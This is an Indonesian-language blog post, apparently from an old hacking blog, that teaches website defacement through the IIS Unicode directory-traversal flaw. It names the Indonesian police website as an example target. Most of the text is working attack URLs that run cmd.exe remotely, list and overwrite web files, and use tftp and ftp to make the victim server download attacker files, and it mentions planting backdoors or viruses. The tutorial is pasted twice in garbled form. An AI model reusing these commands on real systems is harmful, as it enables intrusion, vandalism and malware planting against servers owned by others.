http://www.tritonatm.com/en/service/manuals. Very Happy Very Happy Very Happy
wekekeke....
AWAZ..
kayanya too much risk tuh???
stau gw, coba klo ketik pass atm terbalik,
Deface Website
ini hanyalah contoh !!!!!untuk melakukan deface website1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh–>> www.polri.go.id
2. Login Ini Merupakan Directory yang Ada Di Web Site TersebutDirectory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web iniada beberapa contoh login diantaranya :a)/_vti_binb)/_vti_cnfc)/cgi-bind)/scriptse)/msadc
3. Unicode —>> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nyahasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinnga) ..%c1%1c..b) ..%c0%9v..c) ..%c0%af..d) ..%c0%qf..
e) ..%c1%8s..f) ..%e0%80%af..g) ..%c1%9c..h) ..%c1%pc..
4. OS target –>>ini Menyatakan Sertificate Web Os kita WinNT dan Win980xB5 ISO 8859-10xC5 ISO 8859-10xEA CP4370×2140 JIS X 02080×22 ISO 8859-1
5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.polri.go.id/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ contohnya –>>
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site ituMaka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnyacommand dir yang kita lakukan di Dos PromptDirectory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command/c+dir+c:\ di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set/c+dir+c:\ di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebutKeluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:\wwwpolri
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c:\ menjadi /c+copy+c:\
lalu ditambahkan dengan : winnt\system32\cmd.exe+c:\jangkrik.exe
sehingga kita dapatkan :http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\jangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.)Cari halaman index ke www.target.com/blah.idaKadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\index.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papadengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkanhanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:\inetpub\wwwroot\index.htm+c:\inetpub\wwwroot\index.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\index.htmuntuk tidak merusak web nya kita tulis dengan nama file baruhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\jangkrik.htm
/c+echo+You%20Were%20Hacked+>+c:\ >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:\inetpub\wwwroot\index.htm file yang ditulis atau c:\inetpub\wwwroot\jangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\index.htm/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\jangkrik.htmketerangan :%3d adalah pernyataan tanda =%22 adalah Pernyataan tanda ”%23 adalah pernyataan tanda #Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah ‘type’ :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\index.htmhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\jangkrik.htmAtau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bugcginyasehinggha kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.)Setelaha kita menemukan vulnernyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\Directory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) —->>tujuan nya memedekan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:\inetpub\wwwroot\
d.)Langkah Selanjutnya Yaitu kita membuat script ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benarhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\jangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\wwwroot\jangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belumhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\Kalau dah terkirim selamat dah
Keterangan nya :Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com —>>> scriptnya —>> +echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftpjangkrik —>> user name —>>> scriptnya –>> +echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftpanuamakang —>>> password —>>> scriptnya –>> +echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftplcd c:\inetpub\wwwroot\ —>>> folder tujuan —>>> scriptnya –>>>+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftpascii —>>> bentuk file —>>> scripnya —>>> +echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftpget jangkrik.htm —->>> command tranfer file —>>> +echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftpclose —>> perintah dc ke web server —->>> scripnya —>>> +echo+close+>>+c:\inetpub\wwwroot\
2. Login Ini Merupakan Directory yang Ada Di Web Site TersebutDirectory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web iniada beberapa contoh login diantaranya :a)/_vti_binb)/_vti_cnfc)/cgi-bind)/scriptse)/msadc
3. Unicode —>> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nyahasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinnga) ..%c1%1c..b) ..%c0%9v..c) ..%c0%af..d) ..%c0%qf..
e) ..%c1%8s..f) ..%e0%80%af..g) ..%c1%9c..h) ..%c1%pc..
4. OS target –>>ini Menyatakan Sertificate Web Os kita WinNT dan Win980xB5 ISO 8859-10xC5 ISO 8859-10xEA CP4370×2140 JIS X 02080×22 ISO 8859-1
5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.polri.go.id/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ contohnya –>>
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site ituMaka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnyacommand dir yang kita lakukan di Dos PromptDirectory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command/c+dir+c:\ di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set/c+dir+c:\ di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebutKeluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:\wwwpolri
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c:\ menjadi /c+copy+c:\
lalu ditambahkan dengan : winnt\system32\cmd.exe+c:\jangkrik.exe
sehingga kita dapatkan :http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\jangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.)Cari halaman index ke www.target.com/blah.idaKadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\index.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papadengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkanhanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:\inetpub\wwwroot\index.htm+c:\inetpub\wwwroot\index.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\index.htmuntuk tidak merusak web nya kita tulis dengan nama file baruhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\jangkrik.htm
/c+echo+You%20Were%20Hacked+>+c:\ >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:\inetpub\wwwroot\index.htm file yang ditulis atau c:\inetpub\wwwroot\jangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\index.htm/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\jangkrik.htmketerangan :%3d adalah pernyataan tanda =%22 adalah Pernyataan tanda ”%23 adalah pernyataan tanda #Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah ‘type’ :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\index.htmhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\jangkrik.htmAtau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bugcginyasehinggha kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.)Setelaha kita menemukan vulnernyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\Directory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) —->>tujuan nya memedekan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:\inetpub\wwwroot\
d.)Langkah Selanjutnya Yaitu kita membuat script ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benarhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\jangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\wwwroot\jangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belumhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\Kalau dah terkirim selamat dah
Keterangan nya :Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com —>>> scriptnya —>> +echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftpjangkrik —>> user name —>>> scriptnya –>> +echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftpanuamakang —>>> password —>>> scriptnya –>> +echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftplcd c:\inetpub\wwwroot\ —>>> folder tujuan —>>> scriptnya –>>>+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftpascii —>>> bentuk file —>>> scripnya —>>> +echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftpget jangkrik.htm —->>> command tranfer file —>>> +echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftpclose —>> perintah dc ke web server —->>> scripnya —>>> +echo+close+>>+c:\inetpub\wwwroot\
Langganan:
Postingan (Atom)